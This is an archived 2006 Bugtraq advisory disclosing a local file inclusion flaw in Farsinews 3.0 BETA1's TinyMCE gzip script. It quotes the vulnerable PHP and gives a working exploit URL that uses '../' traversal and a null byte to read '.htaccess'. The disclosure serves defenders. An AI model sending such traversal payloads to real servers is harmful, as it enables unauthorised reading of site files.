| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060710153333.19475.qmail@securityfocus.com>
Date: 10 Jul 2006 15:33:33 -0000
From: armin390@...il.com
To: bugtraq@...urityfocus.com
Subject: Local file inclusion in Farsinews3.0BETA1
if magic_quotes_gpc is Off in php.ini then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!
why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
if ($theme) {
// Write main script and patch some things
echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
echo 'TinyMCE.prototype.loadScript = function() {};';
echo "tinyMCE.init(TinyMCECompressed_settings);";
// Load theme, language pack and theme language packs
echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
echo file_get_contents(realpath("langs/" . $language . ".js"));
#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...
Powered by blists - more mailing lists